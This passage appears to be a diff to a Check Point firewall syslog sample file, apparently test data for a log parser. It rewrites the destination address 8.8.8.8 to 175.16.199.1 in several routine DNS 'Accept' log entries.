+<134>1 2020-03-29T22:24:33Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812021,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585520673"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56420"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T22:25:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812043,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52124"; service:"443"; service_id:"https"; src:"192.168.1.117"]
 <134>1 2020-03-29T22:25:07Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812043,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52125"; service:"443"; service_id:"https"; src:"192.168.1.117"]
 <134>1 2020-03-29T22:25:09Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812045,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60640"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
@@ -6531,9 +6531,9 @@
 <134>1 2020-03-29T22:53:50Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8126fe,0x5,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"6"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.124.249.41"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"60412"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10743"; xlatesrc:"0.0.0.0"]
 <134>1 2020-03-29T22:53:51Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e8126ff,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60640"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
 <134>1 2020-03-29T22:54:00Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812708,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"83.98.201.134"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"53028"; service:"123"; service_id:"ntp-udp"; src:"192.168.2.2"]
-<134>1 2020-03-29T22:54:00Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812708,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49503"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T22:54:00Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812708,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"49503"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T22:54:02Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e81270a,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.255"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"138"; service:"138"; service_id:"nbdatagram"; src:"192.168.1.117"]
-<134>1 2020-03-29T22:54:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812712,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585522450"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40729"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T22:54:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812712,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585522450"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40729"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T22:54:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812712,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"38518"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T22:54:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812712,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"56585"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T22:54:10Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812712,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.99.234.45"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"53730"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10744"; xlatesrc:"0.0.0.0"]
@@ -6730,9 +6730,9 @@
 <134>1 2020-03-29T23:11:53Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812b39,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"60640"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
 <134>1 2020-03-29T23:11:55Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812b3b,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52322"; service:"443"; service_id:"https"; src:"192.168.1.117"]
 <134>1 2020-03-29T23:11:55Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812b3b,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52323"; service:"443"; service_id:"https"; src:"192.168.1.117"]
-<134>1 2020-03-29T23:12:34Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812b62,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55037"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T23:12:34Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812b62,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55037"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T23:12:35Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812b63,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43103"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
-<134>1 2020-03-29T23:12:44Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812b6c,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; log_delay:"1585523564"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"35918"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
+<134>1 2020-03-29T23:12:44Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; conn_direction:"Outgoing"; flags:"6703366"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812b6c,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"175.16.199.1"; log_delay:"1585523564"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"35918"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
 <134>1 2020-03-29T23:12:44Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812b6c,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"63204"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T23:12:44Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812b6c,0x2,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"3"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.1"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"55586"; service:"53"; service_id:"domain-udp"; src:"192.168.1.100"]
 <134>1 2020-03-29T23:12:44Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812b6c,0x3,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"4"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"104.99.234.45"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; nat_addtnl_rulenum:"0"; nat_rulenum:"0"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"54204"; service:"80"; service_id:"http"; src:"192.168.1.100"; xlatedport:"0"; xlatedst:"0.0.0.0"; xlatesport:"10785"; xlatesrc:"0.0.0.0"]
@@ -6904,34 +6904,34 @@
 <134>1 2020-03-29T23:17:01Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"444676"; ifdir:"outbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812c6d,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.153"; inzone:"Local"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"43103"; service:"514"; service_id:"syslog"; src:"192.168.1.100"]
 <134>1 2020-03-29T23:17:09Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812c75,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52351"; service:"443"; service_id:"https"; src:"192.168.1.117"]
 <134>1 2020-03-29T23:17:09Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth0"; logid:"0"; loguid:"{0x5e812c75,0x1,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"2"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"192.168.1.100"; inzone:"External"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"Local"; product:"VPN-1 & FireWall-1"; proto:"6"; s_port:"52352"; service:"443"; service_id:"https"; src:"192.168.1.117"]
-<134>1 2020-03-29T23:17:13Z gw-da58d3 CheckPoint 8363 - [action:"Accept"; flags:"411908"; ifdir:"inbound"; ifname:"eth1"; logid:"0"; loguid:"{0x5e812c79,0x0,0x353707c7,0xee78a1dc}"; origin:"192.168.1.100"; originsicname:"cn=cp_mgmt,o=gw-da58d3..tmn8s8"; sequencenum:"1"; version:"5"; __policy_id_tag:"product=VPN-1 & FireWall-1[db_tag={880771B0-FD92-2C4F-82FC-B96FC3DE5A07};mgmt=gw-da58d3;date=1585502566;policy_name=Standard\]"; dst:"8.8.8.8"; inzone:"Internal"; layer_name:"Network"; layer_uuid:"63b7fe60-76d2-4287-bca5-21af87337b0a"; match_id:"1"; parent_rule:"0"; rule_action:"Accept"; rule_uid:"1fde807b-6300-4b1a-914f-f1c1f3e2e7d2"; outzone:"External"; product:"VPN-1 & FireWall-1"; proto:"17"; s_port:"40357"; service:"53"; service_id:"domain-udp"; src:"192.168.2.2"]
